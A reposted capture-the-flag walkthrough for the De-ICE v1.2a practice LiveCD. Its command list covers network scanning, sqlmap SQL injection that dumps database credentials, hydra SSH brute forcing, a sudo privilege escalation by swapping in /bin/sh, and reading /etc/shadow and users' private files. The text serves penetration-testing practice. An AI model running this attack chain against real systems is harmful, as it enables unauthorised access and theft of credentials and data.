Sunday, September 11, 2011

HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

De-ICE has another challenge in its "vulnerable-by-design" series - even though the naming gets more confusing with every release! It's been a while since the last release, level 2-disk 1 (back in 2007). The students of "HackingDojo" were challenged to put together their own exploitable LiveCD, and it was released under the de-ice name. This is "version a", and should be not confused with "version B" (de-ice-1.120-1.0b.iso aka Level 1-Disk 3-Release 1-Version B), as these are NOT the same challenge - it's a different setup.

Heorot.net release's (in date order):

De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)
pWnOS (pWnOS v1.0.zip)
Hackerdemia (hackerdemia-1.1.0.iso)
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)

Method

Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
Scan network for the host (nmap)
Port scanned host (unicornscan)
Enumerated running services running open ports (nmap)
Discovered a SQL Injection (Firefox)
Dump all usernames & passwords to the database (sqlmap)
Tested for any repeated logins with known usernames & working passwords (hydra)
Escalated privilege by incorrectly configured settings (sudo)

What do I need?

de-ice-1.120-1.0a.iso (MD5: E8FB66760ADDF85896DB3F78F278F7D2)
Spare or a Virtual machine (Example: Virtual Box or VMware Player)
nmap – (Can be found on BackTrack 5).
unicornscan – (Can be found in BackTrack 5 repository).
sqlmap – (Can be found on BackTrack 5).
hydra – (Can be found on BackTrack 5).

Walkthrough

A quick "ping" scan with nmap, shows which hosts are connected to the network. Once the target had been discovered a detailed port scan (TCP & UDP) was taken by using unicornscan. To check the results another detailed TCP port scan was done, though this time it was done using nmap. Unicornscan uses a lot less time to do a port scan compared to nmap (especially with UDP scanning). However, nmap has the advantage of being able to do more than just "port scanning" by "information gathering". The attacker uses the "-a" option, which allows for "OS detection", "version detection of services", "a collection of script scanning", and "traceroute details" as well as increasing the scan speed by "-T4". nmap also confirms TCP port 80 is open, which is the default port for a web server, as well as detecting basic information regarding the configuration of the server.

The attacker then interacts with the web server and is presented with a "Data Entry" site. There isn't any protection on the server, which allows for the attacker to add a new product into the system. Upon doing so, the attacker notices the URI of the current page, "products.php?id=1". By using the ID variable, the server selects the requested item. The attacker tries to inject their own code allowed with it.

The attacker uses sqlmap to speed up the injection process as it is designed to test multiple injection methods. sqlmap has pre-built commands which allows the attacker to find common sensitive information (such as; the running services and versions, current user and the database admin, user privileges as well as viewing every table along with the contents). The attacker chooses to capture all the users and their passwords to the database services. The passwords used in the database are encrypted, however, they use a well-known scheme which is easily cracked. The result of this, gives the attacker 50 working usernames as well as 49 known passwords too.

The attacker then checks to see if any of the users have reused their passwords (or if they have used someone else known password, any blank passwords or their usernames as the passwords), by brute forcing the SSH remote login. The result of this action, gives the attacker remote access to the system with 50 credentials.

On the list of credentials, the attacker notices a few usernames which they have seen before from previous pentests for the company. The attacker then logs into their accounts and views their personal folders. Upon accessing "ccoffee" account, there was a directory (scripts) located inside. In this folder, there was a file which was only accessible to the super user account, root. The attacker then checks to see if any privileges have been assigned to the user for this file-they have been. The attacker then backups the file and replaces it with their own file - which is a shell prompt.

The attacker highlights the fact that the full path has to be specified for sudo to allow access to the file. After this command has been executed, the attacker now has complete access to the system. The attacker collects a bit of information about the system (IP addresses, user hashes and accesses the personal folder for the root account).

As the attacker now has access to the complete system, they access every user folder at once and view random files at their choosing; a selection of them are sensitive to the company. (Note: I skipped the majority of them out for two reasons: 1.) It's boring watching me cat'ing them all and 2.) It allows you to view them for yourselves).

Game over

Commands

ifconfig eth0
ifconfig eth0 192.168.1.59
ifconfig eth0
nmap 192.168.1.* -n -sn -sP
us -H -msf -Iv 192.168.1.120 -p 1-65535 && us -H -mU -Iv 192.168.1.120 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.13.120
firefox 192.168.1.120 # Add new product -> view product
cd /pentest/database/sqlmap
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" -f -b --current-user --is-dba --is-dba --privileges --dbs --dump
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" --users --passwords
cd output/192.168.1.120/
ll
grep -i administrator log
grep -i localhost log | grep -v : | sort | uniq
grep -i localhost log | grep -v : | sort | uniq | sed "s/\[\*\] '//" | sed "s/'@'localhost'//" > /tmp/users
grep "clear-text" log | sort | uniq
grep "clear-text" log | sort | uniq | sed "s/ clear-text password: //" > /tmp/passwords
wc -l /tmp/users
hydra -L /tmp/users -P /tmp/passwords -e ns 192.168.1.120 ssh 2>/dev/null | tee /tmp/output
#medusa -h 192.168.1.120 -U /tmp/users -P /tmp/passwords -O /tmp/output -e ns -M ssh
ssh ccoffee@192.168.1.120
ls
cd scripts
ls -lah
sudo -l
cat getlogs.sh
mv getlogs.sh getlogs.bkup
echo "/bin/sh" > getlogs.sh
cat getlogs.sh
chmod +x getlogs.sh
ls -l
./getlogs.sh
id
exit
sudo getlogs.sh
sudo /home/ccoffee/scripts/getlogs.sh
id
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root/
ls -lAhR /home
#cat /home/aallen/gravy.txt
cat /home/aspears/hbkae
cat /home/bbanter/notes
cat /home/cchisholm/reminders.text
cat /home/ccoffee/DONOTFORGET
#cat /home/hlovell/creepy.doc
cat /home/jalvarez/draft
cat /home/jdavenport/company_address.txt
#cat /home/jdavenport/svrc.txt
cat /home/jduff/todo.txt
#cat /home/krenfro/list
cat /home/ktso/personnel.doc
#cat /home/kwebber/list
#cat /home/lmartinez/favorite.txt
#cat /home/mnader/layout
cat /home/rpatel/schedule


Notes

- De-ICE.net v1.2a has a static IP address of 192.168.1.120. Make sure you are on the same subnet as it!
- When booting De-ICE it will randomly assign the passwords to the usernames - so it's different each time!
- Each time you start De-ICE.net v1.2a it will generate fresh SSH keys - so it's different each time!
- I made a couple of mistakes in the video (For example: /devnull) - it's worth checking the commands subsection!

That's all! See you.